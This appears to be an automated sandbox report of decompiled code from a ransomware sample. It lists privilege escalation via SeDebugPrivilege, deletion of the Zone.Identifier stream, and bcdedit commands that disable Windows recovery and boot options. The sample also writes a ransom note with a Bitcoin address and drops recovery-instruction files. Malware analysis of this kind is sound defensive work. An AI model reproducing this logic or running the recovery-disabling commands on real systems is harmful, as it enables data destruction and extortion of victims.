FindNextFileW.KERNELBASE(00000000,00000010), ref: 00413E1B
FindClose.KERNEL32(00000000), ref: 00413E2A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

.micro, xrefs: 00413DDD
C:\ProgramData, xrefs: 00413CCB
C:\Windows, xrefs: 00413C4F
recove, xrefs: 00413DCD
\*.*, xrefs: 00413B20
C:\Program Files, xrefs: 00413C8D

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 00170000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,72D08B8C), ref: 0017018C
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001701FD
CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00170306

Part of subcall function 001705DB: LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,00170327,2B14D0EE,?), ref: 00170607

Strings

, xrefs: 001702D6
a, xrefs: 001702CB

Memory Dump Source

Source File: 00000001.00000002.1396966249.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_170000_amhfnhe45.jbxd

Function 004201F0, Relevance: 6.0, APIs: 4, Instructions: 46

C-Code - Quality: 89%

			E004201F0(intOrPtr __edx, intOrPtr __esi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				signed int _t13;
				intOrPtr _t24;
				intOrPtr _t31;
				intOrPtr _t34;
				signed int _t36;

				_t31 = __edx;
				_t13 =  *0x43f054; // 0xd6baf341
				_v8 = _t13 ^ _t36;
				if(OpenProcessToken(GetCurrentProcess(), 0x20028,  &_v28) != 0) {
					_v24.Privileges =  *((intOrPtr*)(__esi));
					_v24.PrivilegeCount = 1;
					_v16 =  *((intOrPtr*)(__esi + 4));
					_v12 = 2;
					AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0); // executed
					CloseHandle(_v28);
					return E004256FE(1, _t24, _v8 ^ _t36, _v28, _t34, __esi);
				} else {
					return E004256FE(_t17, _t24, _v8 ^ _t36, _t31, _t34, __esi);
				}
			}

0x004201f0
0x004201f8
0x004201ff
0x0042021a
0x00420239
0x00420242
0x00420249
0x0042024c
0x00420253
0x0042025d
0x00420275
0x0042021c
0x00420229
0x00420229

APIs

GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F47E), ref: 0042020B
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F47E), ref: 00420212
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420253
CloseHandle.KERNEL32(?), ref: 0042025D

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0041BB40, Relevance: 1.6, APIs: 1, Instructions: 85

C-Code - Quality: 48%

			E0041BB40(void* __ecx, long __edx, void* _a4, DWORD* _a8) {
				signed int _v8;
				char _v136;
				int _v140;
				DWORD* _v144;
				long _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				int _v164;
				void* _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				int _t36;
				intOrPtr* _t38;
				intOrPtr* _t39;
				intOrPtr _t42;
				int _t44;
				intOrPtr _t56;
				char* _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t67;
				void* _t68;

				_t65 = _t67;
				_t68 = _t67 - 0xa4;
				_t30 =  *0x43f054; // 0xd6baf341
				_v8 = _t30 ^ _t65;
				_v160 = _a4;
				_v144 = _a8;
				_t34 = 0;
				_v152 = __ecx;
				_t61 = 0x4344a4;
				_t44 = 0;
				_v148 = __edx;
				_v164 = 0;
				_v168 = 0x4344a4;
				_v140 = 0;
				_t52 = 0xf2;
				while( *((intOrPtr*)(_t44 + 0x4344a4)) != _t52) {
					_t44 = _t44 + 1;
					if(_t44 < 0x80) {
						continue;
					} else {
						_v140 = _t44;
						L8:
						_t38 = E00413000(_t52, 0, 1, 0xa48d6762);
						_t68 = _t68 + 0xc;
						_push(_t61);
						if( *_t38() == 0) {
							_t39 = E00413000(_t52, _t34, 1, 0xc8ac8026);
							_t68 = _t68 + 0xc;
							_t34 =  *_t39(_t61);
						}
					}
					L10:
					E00412F20(_t34, 0x1a212962);
					_t36 = InternetReadFile(_v160, _v152, _v148, _v144); // executed
					_pop(_t56);
					_pop(_t62);
					_pop(_t42);
					return E004256FE(_t36, _t42, _v8 ^ _t65, _v160, _t56, _t62);
				}
				_t52 =  &_v136;
				_v140 = _t44;
				_v156 =  &_v136;
				if(_t44 > 0) {
					asm("pushad");
					memcpy(_v156, _v168, _v140);
					_t68 = _t68 + 0xc;
					asm("popad");
					_t34 = _v164;
					_t44 = _v140;
				}
				 *((char*)(_t65 + _t44 - 0x84)) = 0;
				_t61 =  &_v136;
				if(_v136 != 0) {
					goto L8;
				}
				goto L10;
			}

0x0041bb43
0x0041bb45
0x0041bb4b
0x0041bb52
0x0041bb58
0x0041bb63
0x0041bb69
0x0041bb6b
0x0041bb71
0x0041bb76
0x0041bb78
0x0041bb7f
0x0041bb85
0x0041bb8b
0x0041bb91
0x0041bb93
0x0041bb9b
0x0041bba2
0x00000000
0x0041bba4
0x0041bba4
0x0041bbfb
0x0041bc04
0x0041bc09
0x0041bc0c
0x0041bc11
0x0041bc1b
0x0041bc20
0x0041bc24
0x0041bc24
0x0041bc11
0x0041bc26
0x0041bc2c
0x0041bc50
0x0041bc55
0x0041bc56
0x0041bc59
0x0041bc62
0x0041bc62
0x0041bbac
0x0041bbb2
0x0041bbb8
0x0041bbc0
0x0041bbc2
0x0041bbd5
0x0041bbd5
0x0041bbd7
0x0041bbd8
0x0041bbde
0x0041bbde
0x0041bbe4
0x0041bbf3
0x0041bbf9
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,?,?,00000000,00000000), ref: 0041BC50

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0042C13E, Relevance: 1.5, APIs: 1, Instructions: 4

C-Code - Quality: 100%

			E0042C13E() {

				SetUnhandledExceptionFilter(E0042C0FC); // executed
				return 0;
			}

0x0042c143
0x0042c14b

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002C0FC), ref: 0042C143

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0041F040, Relevance: 112.6, APIs: 29, Strings: 35, Instructions: 620

C-Code - Quality: 54%

			E0041F040(void* __eflags, long _a4, void* _a8, struct _LUID _a32, char _a72, char _a73, char _a116, intOrPtr _a184, intOrPtr _a188, long _a192, char _a196, char _a220, char _a240, char _a252, char _a284, long _a288, intOrPtr _a292, intOrPtr _a296, struct _SID_IDENTIFIER_AUTHORITY _a300, char _a304, intOrPtr _a306, intOrPtr _a310, intOrPtr _a314, intOrPtr _a318, short _a322, char _a544, char _a546, signed int _a8752, signed int _a8908, signed int _a8916, signed int _a9020) {
				void* _v4;
				long _v8;
				void* _v20;
				char _v24;
				intOrPtr* _v40;
				intOrPtr _v44;
				char _v62;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v116;
				intOrPtr* _v124;
				intOrPtr* _v132;
				long _v248;
				char _v260;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t99;
				int _t103;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t123;
				intOrPtr* _t127;
				intOrPtr* _t132;
				intOrPtr* _t135;
				intOrPtr* _t138;
				struct HINSTANCE__* _t143;
				_Unknown_base(*)()* _t145;
				intOrPtr _t160;
				void* _t162;
				signed int _t163;
				long _t166;
				signed int _t183;
				signed int _t186;
				void* _t189;
				intOrPtr* _t191;
				void* _t213;
				char _t218;
				signed int _t219;
				void* _t227;
				void* _t231;
				void* _t232;
				void* _t234;
				void* _t236;
				void* _t237;
				intOrPtr* _t245;
				intOrPtr _t253;
				intOrPtr _t255;
				char* _t256;
				intOrPtr _t282;
				intOrPtr _t292;
				intOrPtr* _t295;
				intOrPtr* _t296;
				void* _t297;
				void* _t298;
				struct HINSTANCE__* _t299;
				struct HINSTANCE__* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t306;
				void* _t307;
				signed char* _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				signed int _t315;
				void* _t320;
				signed int _t321;
				void* _t329;
				void* _t330;
				void* _t363;

				_t313 = _t312 & 0xfffffff8;
				E0042E220(0x2344);
				_t99 =  *0x43f054; // 0xd6baf341
				_a9020 = _t99 ^ _t313;
				E004205E0(); // executed
				_a4 = 0;
				_a300.Value = 0;
				_a304 = 0x500;
				_t103 = AllocateAndInitializeSid( &_a300, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_a8);
				_a4 = _t103;
				if(_t103 != 0) {
					_t227 = _a8;
					__imp__CheckTokenMembership(0, _t227,  &_a4);
					if(_t227 == 0) {
						_v8 = 0;
					}
					FreeSid(_v4);
					_t103 = _v8;
				}
				_t305 = __imp__SHGetFolderPathW;
				 *0x482238 = _t103; // executed
				 *_t305(0, 0x1a, 0, 0, "C:\Users\admin\AppData\Roaming"); // executed
				_a306 = 0;
				_a310 = 0;
				_a314 = 0;
				_a318 = 0;
				_a322 = 0;
				_a304 = 0;
				E004233D0( &_a304, 9);
				_t295 = __imp__CoCreateInstance; // 0x76de9d0b
				_t314 = _t313 + 8;
				_v20 = 0;
				_v24 = 0;
				_a288 = 0;
				_a292 = 0;
				_a296 = 0;
				_a300.Value = 0;
				 *_t295(0x43b924, 0, 1, 0x4312c8,  &_v20); // executed
				_t110 = _v40;
				_push( &_a284);
				_push(0);
				_push(_t110);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0xc))))() != 0x80004003) {
					ExitProcess(0xffffffff);
				}
				 *_t295(0x43b934, 0, 1, 0x4312b8,  &_v24); // executed
				_t114 = _v72;
				 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0xc))))(_t114, _v44,  &_a252);
				_t117 = _v84;
				 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x18))))(_t117,  &_a240,  &_v88);
				_t296 = _v100;
				if(_t296 == 0) {
					ExitProcess(1);
				}
				_v64 = 0;
				E0042D0A0( &_v62, 0, 0xfe);
				_t315 = _t314 + 0xc;
				_a192 = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t296 + 0x30))))(_t296,  &_v64);
				_t245 =  &_v72;
				_t123 =  &_a220;
				while(1) {
					_t276 =  *_t123;
					if(_t276 !=  *_t245) {
						break;
					}
					if(_t276 == 0) {
						L13:
						_t123 = 0;
					} else {
						_t276 =  *((intOrPtr*)(_t123 + 2));
						if(_t276 !=  *((intOrPtr*)(_t245 + 2))) {
							break;
						} else {
							_t123 = _t123 + 4;
							_t245 = _t245 + 4;
							if(_t276 != 0) {
								continue;
							} else {
								goto L13;
							}
						}
					}
					L15:
					if(_t123 != 0 || _a184 != _v104) {
						L50:
						_pop(_t297);
						_pop(_t306);
						_pop(_t231);
						__eflags = 0;
						return E004256FE(0, _t231, _a8916 ^ _t315, _t276, _t297, _t306);
					} else {
						_t127 = _v108;
						_t277 =  &_v80;
						_push( &_v80);
						_push(_t127);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x24))))() != 0 || _v88 != 0) {
							L35:
							_pop(_t298);
							_pop(_t307);
							_pop(_t232);
							return E004256FE(1, _t232, _a8908 ^ _t315, _t277, _t298, _t307);
						} else {
							_t132 = _v116;
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))(_t132,  &_a196);
							if(_a188 == 0) {
								E00426928(1);
							}
							_t135 = _v124;
							_v104 = 0;
							if(_t135 == 0) {
								_t135 = E00426928(0xffffffff);
							}
							_push( &_v104);
							_push(_t135);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x28))))() != 0) {
								E00426928(0xffffffff);
							}
							_t138 = _v132;
							_t253 =  *_t138;
							_t280 =  *((intOrPtr*)(_t253 + 4));
							_push(_t138);
							if( *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))() == 0) {
								E00426928(0xffffffff);
							}
							_t299 = LoadLibraryW(L"Shell32.dll");
							LoadStringW(_t299, 0x5509, "Desktop", 0xff); // executed
							LoadStringW(_t299, 0x5527, "Public Desktop", 0xff);
							_t143 = GetModuleHandleW(L"KERNEL32");
							_t234 = GetProcAddress;
							_t300 = _t143;
							 *0x48223c = GetProcAddress(_t300, "Wow64DisableWow64FsRedirection");
							_t145 = GetProcAddress(_t300, "Wow64RevertWow64FsRedirection");
							 *0x482240 = _t145; // executed
							 *_t305(0, 0x24, 0, 0, "C:\Windows"); // executed
							 *_t305(0, 0x26, 0, 0, "C:\Program Files"); // executed
							 *_t305(0, 0x3b, 0, 0, "C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn"); // executed
							__imp__SHGetSpecialFolderPathW(0, "C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 5, 0); // executed
							E00425ACD("C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 0x1000, L"\\recover_file_");
							E00425ACD("C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 0x1000,  &_a116);
							E00425ACD("C:\Users\admin\Documents\recover_file_bmrurerhv.txt", 0x1000, L".txt");
							 *_t305(0, 0x10, 0, 0, "C:\Users\admin\Desktop"); // executed
							 *_t305(0, 0x19, 0, 0, "C:\Users\Public\Desktop"); // executed
							 *_t305(0, 0x23, 0, 0, "C:\ProgramData"); // executed
							GetModuleFileNameW(0, "C:\Users\admin\AppData\Roaming\amhfnhe45.exe", 0x1000);
							E0042623B("C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier", 0x1000, "C:\Users\admin\AppData\Roaming\amhfnhe45.exe");
							E00425ACD("C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier", 0x1000, L":Zone.Identifier");
							_t320 = _t315 + 0x3c;
							DeleteFileW("C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier"); // executed
							_t160 = E00420160(); // executed
							 *0x462860 = _t160;
							if(LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_a32) != 0) {
								_t305 =  &_a32;
								E004201F0(_t280,  &_a32); // executed
							}
							_t277 =  &_v260;
							_t162 = E0041F9D0( &_v260); // executed
							_t315 = _t320 + 4;
							if(_t162 == 0) {
								_t163 = E0041FAE0(_t234, __eflags);
								__eflags = _t163;
								if(_t163 != 0) {
									goto L35;
								} else {
									goto L41;
								}
							} else {
								_t218 = _v260;
								_t363 = _t218 - 0x2000;
								if(_t363 > 0) {
									__eflags = _t218 - 0x3000;
									if(__eflags == 0) {
										goto L38;
									} else {
										__eflags = _t218 - 0x4000;
										if(__eflags != 0) {
											goto L41;
										} else {
											goto L38;
										}
									}
								} else {
									if(_t363 == 0) {
										L38:
										_t219 = E0041FAE0(_t234, __eflags); // executed
										__eflags = _t219;
										if(_t219 == 0) {
											goto L41;
										} else {
											_pop(_t303);
											_pop(_t311);
											_pop(_t237);
											__eflags = _a8752 ^ _t315;
											return E004256FE(1, _t237, _a8752 ^ _t315, _t277, _t303, _t311);
										}
									} else {
										if(_t218 == 0 || _t218 == 0x1000) {
											E0041E880();
											goto L35;
										} else {
											L41:
											E00413000(_t277, 0, 1, 0xbf78968a);
											_t321 = _t315 + 0xc;
											CreateMutexW(0, 0, L"12393578327533451"); // executed
											_t166 = GetLastError();
											__eflags = _t166 - 0xb7;
											if(_t166 != 0xb7) {
												E0042D0A0(0x441738, 0, 0x11c);
												0x441738->dwOSVersionInfoSize = 0x11c;
												GetVersionExW(0x441738);
												E00401480(1, _t300, __eflags); // executed
												E0041FD80(1, _t300, _t305); // executed
												_v248 = 0;
												CreateThread(0, 0, E0041EA20, 0, 0,  &_v248); // executed
												E0041EF90("bcdedit.exe /set {current} bootems off"); // executed
												E0041EF90("bcdedit.exe /set {current} advancedoptions off"); // executed
												E0041EF90("bcdedit.exe /set {current} optionsedit off"); // executed
												E0041EF90("bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures"); // executed
												E0041EF90("bcdedit.exe /set {current} recoveryenabled off"); // executed
												E0041EC00(_t300, __eflags); // executed
												_push("AA6A331C729CA1F");
												_push("AA6A331C729CA1F");
												_t255 =  *0x462894; // 0x2066f38
												_push("AA6A331C729CA1F");
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, " __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!  NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo", _t255, 0x441d28);
												_push("AA6A331C729CA1F");
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_t282 =  *0x4665a4; // 0x206adc0
												_push("AA6A331C729CA1F");
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, "<html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb {  background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:", _t282, 0x441d28);
												_a72 = 0;
												E0042D0A0( &_a73, 0, 0x1df);
												_t329 = _t321 + 0xd8;
												_t256 =  &_a72;
												_t308 = 0x441d88;
												do {
													_t183 =  *_t308 & 0x000000ff;
													_t78 = "0123456789ABCDEF" + (_t183 >> 4); // 0x33323130
													_t286 =  *_t78;
													_t79 = "0123456789ABCDEF" + (_t183 & 0x0000000f); // 0x33323130
													 *_t256 =  *_t78;
													 *((char*)(_t256 + 1)) =  *_t79;
													_t308 =  &(_t308[1]);
													_t256 = _t256 + 2;
													__eflags = _t308 - 0x441de9;
												} while (_t308 != 0x441de9);
												 *_t256 = 0;
												_t186 = E00426466( &_v260, "C:\Users\admin\Documents\recover_file_bmrurerhv.txt", L"w+"); // executed
												_t330 = _t329 + 0xc;
												__eflags = _t186;
												if(__eflags == 0) {
													_t292 =  *0x462860; // 0x5e
													_push(_t292);
													_push("AA6A331C729CA1F");
													_push( &_a72);
													_push("149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg");
													_push("%s\n%s\n%S\n%d\n");
													_push(_v260); // executed
													E004264B8(1, _t300, _t308, __eflags); // executed
													_t286 = _v260;
													_push(_v260); // executed
													_t186 = E00426631(1, _t300, _t308, __eflags); // executed
													_t330 = _t330 + 0x1c;
												}
												E00423440(_t186);
												_t301 = 0;
												__eflags =  *0x441d1c - 1; // 0x1
												if(__eflags == 0) {
													 *0x462864 = 0; // executed
													_t213 = E00420700(E0041B480); // executed
													_t330 = _t330 + 4;
													_t301 = _t213;
												}
												 *0x46a234 = 1; // executed
												E00420700(E0041FF20); // executed
												_t189 = E00420700(E00413840); // executed
												_t309 = _t189;
												SetThreadPriority(_t309, 0xfffffff1);
												_t191 = E00413000(_t286, 0, 1, 0xc54374f3);
												 *_t191(_t309, 0xffffffff);
												__eflags = 0;
												_a544 = 0;
												E0042D0A0( &_a546, 0, 0x1ffe);
												E00414300(0x1000,  &_a544, L"%s\\help_recover_instructions.TXT", "C:\Users\admin\Desktop");
												E0041F910( &_a544,  &_a546);
												E00420730( &_a544);
												_push(L".HTM");
												E00414300(0x1000,  &_a544, L"%s\\help_recover_instructions%s", "C:\Users\admin\Desktop");
												E0041F970( &_a544,  &_a544);
												E00420730( &_a544);
												E00414300(0x1000,  &_a544, L"%s\\help_recover_instructions.BMP", "C:\Users\admin\Desktop");
												E00420350( &_a544);
												_t276 =  &_a544;
												E00420730( &_a544);
												E00420700(E0041EA20);
												E00420840( &_a544, _t301, 0x2bf20);
												 *0x462864 = 1;
												E00420840( &_a544, E00420700(E0041B480), 0xea60);
												_t315 = _t330 + 0x70;
												E0041FC50(1, _t276, _t301, _t309, __eflags);
												goto L50;
											} else {
												_pop(_t302);
												_pop(_t310);
												_pop(_t236);
												__eflags = _a8752 ^ _t321;
												return E004256FE(1, _t236, _a8752 ^ _t321, _t277, _t302, _t310);
											}
										}
									}
								}
							}
						}
					}
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L15;
			}

0x0041f045
0x0041f04d
0x0041f052
0x0041f059
0x0041f063
0x0041f086
0x0041f08a
0x0041f091
0x0041f09b
0x0041f0a1
0x0041f0a7
0x0041f0a9
0x0041f0b4
0x0041f0bc
0x0041f0be
0x0041f0be
0x0041f0c7
0x0041f0cd
0x0041f0cd
0x0041f0d1
0x0041f0e1
0x0041f0e6
0x0041f0ea
0x0041f0f1
0x0041f0f8
0x0041f0ff
0x0041f106
0x0041f11a
0x0041f122
0x0041f127
0x0041f12d
0x0041f144
0x0041f148
0x0041f14c
0x0041f153
0x0041f15a
0x0041f161
0x0041f168
0x0041f16a
0x0041f17a
0x0041f17b
0x0041f17c
0x0041f184
0x0041f188
0x0041f188
0x0041f1a0
0x0041f1a2
0x0041f1b9
0x0041f1bb
0x0041f1d2
0x0041f1d4
0x0041f1da
0x0041f1de
0x0041f1de
0x0041f1f1
0x0041f1f6
0x0041f1fb
0x0041f202
0x0041f210
0x0041f212
0x0041f216
0x0041f220
0x0041f220
0x0041f226
0x00000000
0x00000000
0x0041f22b
0x0041f242
0x0041f242
0x0041f22d
0x0041f22d
0x0041f235
0x00000000
0x0041f237
0x0041f237
0x0041f23a
0x0041f240
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f240
0x0041f235
0x0041f24b
0x0041f24d
0x0041f8f5
0x0041f8fc
0x0041f8fd
0x0041f8fe
0x0041f901
0x0041f90b
0x0041f264
0x0041f264
0x0041f26a
0x0041f26e
0x0041f26f
0x0041f277
0x0041f4ac
0x0041f4b1
0x0041f4b2
0x0041f4b3
0x0041f4c5
0x0041f287
0x0041f287
0x0041f299
0x0041f2a2
0x0041f2a6
0x0041f2a6
0x0041f2ab
0x0041f2af
0x0041f2b5
0x0041f2b9
0x0041f2b9
0x0041f2c4
0x0041f2c5
0x0041f2cd
0x0041f2d1
0x0041f2d1
0x0041f2d6
0x0041f2da
0x0041f2dc
0x0041f2df
0x0041f2e4
0x0041f2e8
0x0041f2e8
0x0041f308
0x0041f310
0x0041f322
0x0041f329
0x0041f32f
0x0041f335
0x0041f345
0x0041f34a
0x0041f359
0x0041f35e
0x0041f36d
0x0041f37c
0x0041f389
0x0041f39e
0x0041f3b8
0x0041f3cf
0x0041f3e4
0x0041f3f3
0x0041f402
0x0041f410
0x0041f425
0x0041f43c
0x0041f441
0x0041f449
0x0041f44f
0x0041f463
0x0041f470
0x0041f472
0x0041f479
0x0041f479
0x0041f47e
0x0041f483
0x0041f488
0x0041f48d
0x0041f4fb
0x0041f500
0x0041f502
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f48f
0x0041f48f
0x0041f493
0x0041f498
0x0041f4c8
0x0041f4cd
0x00000000
0x0041f4cf
0x0041f4cf
0x0041f4d4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f4d4
0x0041f49a
0x0041f49a
0x0041f4d6
0x0041f4d6
0x0041f4db
0x0041f4dd
0x00000000
0x0041f4df
0x0041f4e4
0x0041f4e5
0x0041f4e6
0x0041f4ee
0x0041f4f8
0x0041f4f8
0x0041f49c
0x0041f49e
0x0041f4a7
0x00000000
0x0041f504
0x0041f504
0x0041f511
0x0041f516
0x0041f522
0x0041f524
0x0041f52a
0x0041f52f
0x0041f556
0x0041f563
0x0041f56d
0x0041f573
0x0041f578
0x0041f58f
0x0041f597
0x0041f5a2
0x0041f5af
0x0041f5bc
0x0041f5c9
0x0041f5d6
0x0041f5de
0x0041f5e3
0x0041f5e8
0x0041f5ed
0x0041f5f3
0x0041f5f8
0x0041f5fd
0x0041f602
0x0041f607
0x0041f60c
0x0041f611
0x0041f616
0x0041f61b
0x0041f620
0x0041f635
0x0041f63d
0x0041f642
0x0041f647
0x0041f64c
0x0041f651
0x0041f656
0x0041f65b
0x0041f660
0x0041f665
0x0041f66a
0x0041f66f
0x0041f674
0x0041f679
0x0041f67e
0x0041f683
0x0041f688
0x0041f68e
0x0041f693
0x0041f698
0x0041f69d
0x0041f6a2
0x0041f6a7
0x0041f6ac
0x0041f6b1
0x0041f6b6
0x0041f6bb
0x0041f6d0
0x0041f6e4
0x0041f6ec
0x0041f6f1
0x0041f6f4
0x0041f6fb
0x0041f700
0x0041f700
0x0041f708
0x0041f708
0x0041f711
0x0041f717
0x0041f719
0x0041f71c
0x0041f71e
0x0041f721
0x0041f721
0x0041f72e
0x0041f73b
0x0041f740
0x0041f743
0x0041f745
0x0041f747
0x0041f751
0x0041f752
0x0041f75e
0x0041f75f
0x0041f764
0x0041f769
0x0041f76a
0x0041f76f
0x0041f773
0x0041f774
0x0041f779
0x0041f779
0x0041f77c
0x0041f781
0x0041f783
0x0041f789
0x0041f790
0x0041f796
0x0041f79b
0x0041f79e
0x0041f79e
0x0041f7a5
0x0041f7ab
0x0041f7b8
0x0041f7c0
0x0041f7c5
0x0041f7d3
0x0041f7de
0x0041f7e0
0x0041f7f0
0x0041f7f8
0x0041f817
0x0041f826
0x0041f833
0x0041f83b
0x0041f857
0x0041f863
0x0041f870
0x0041f88f
0x0041f89f
0x0041f8a4
0x0041f8af
0x0041f8bc
0x0041f8ca
0x0041f8d4
0x0041f8e8
0x0041f8ed
0x0041f8f0
0x00000000
0x0041f531
0x0041f533
0x0041f534
0x0041f535
0x0041f53d
0x0041f547
0x0041f547
0x0041f52f
0x0041f49e
0x0041f49a
0x0041f498
0x0041f48d
0x0041f277
0x0041f24d
0x0041f246
0x0041f248
0x00000000

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0041F09B
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041F0B4
FreeSid.ADVAPI32(?), ref: 0041F0C7
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 0041F0E6

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,uuk,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

CoCreateInstance.OLE32(0043B924,00000000,00000001,004312C8,?), ref: 0041F168
ExitProcess.KERNEL32 ref: 0041F188
CoCreateInstance.OLE32(0043B934,00000000,00000001,004312B8,?), ref: 0041F1A0
ExitProcess.KERNEL32 ref: 0041F1DE
LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F2F2
LoadStringW.USER32(00000000,00005509,Desktop,000000FF), ref: 0041F310
LoadStringW.USER32(00000000,00005527,Public Desktop,000000FF), ref: 0041F322
GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F329
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F33D
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F34A
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,C:\Windows), ref: 0041F35E
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,C:\Program Files), ref: 0041F36D
